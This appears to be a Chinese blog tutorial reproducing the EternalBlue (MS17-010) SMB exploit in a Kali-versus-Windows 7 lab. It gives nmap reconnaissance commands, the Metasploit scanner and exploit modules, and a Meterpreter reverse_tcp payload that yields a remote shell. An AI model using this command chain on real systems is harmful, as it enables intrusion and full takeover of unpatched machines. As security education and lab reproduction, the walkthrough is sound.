[CVE漏洞复现系列]CVE2017_0147:永恒之蓝

Hi~ o( ̄▽ ̄)ブ

文章目录

  • 前言
  • 一、永恒之蓝是什么?
    • 1.SMB协议介绍。
  • 二、准备工作
    • 1.Windows7 and kali linux
    • 2.テストを開始
  • 总结


前言

这是新的系列,我能力有限有的漏洞实现不了,我尽力吧


一、永恒之蓝是什么?

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

1.SMB协议介绍。

SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API),一般端口使用为139,445。

二、准备工作

1.Windows7 and kali linux

[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第1张图片

2.テストを開始

打开终端输入

nmap -sP 输入kali的IP地址/24

找到win7的IP
[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第2张图片

nmap -O win7IP地址

[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第3张图片
我们可以看到,445端口是开着的,(废话,刚装的Windows端口本来就是开着的)
打开metasploit
[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第4张图片
搜索扫描和攻击模块
输入

search ms17_010

[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第5张图片

exploit/windows/smb/ms17_010_eternalblue 攻击模块
auxiliary/scanner/smb/smb_ms17_010 扫描模块

让我们使用扫描

use auxiliary/scanner/smb/smb_ms17_010 

输入hosts
就像这样
[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第6张图片

接着执行这个已经设置好参数的探测模块

输入

run

[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第7张图片

翻译:[+]192.168.169.193:445-主机可能对MS17-010脆弱!-Windows 7 Professional 7600 x64(64位)
     [*]192.168.169.193:445-扫描了1台主机中的1台(100%完成)
     [*]辅助模块执行完成

扫描完成了,我们该使用攻击模块了

run exploit/windows/smb/ms17_010_eternalblue

[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第8张图片
我们需要设置的参数为payload(攻击载荷),rhost(目标IP)

set payload windows/x64/meterpreter/reverse_tcp

最后一步,输入

exploit

[CVE漏洞复现系列]CVE2017_0147:永恒之蓝_第9张图片
已经成功了,输入shell拿权限
输入

chcp 65001

解决乱码问题
然后就为所欲为了


总结

你可能感兴趣的:(网络,安全)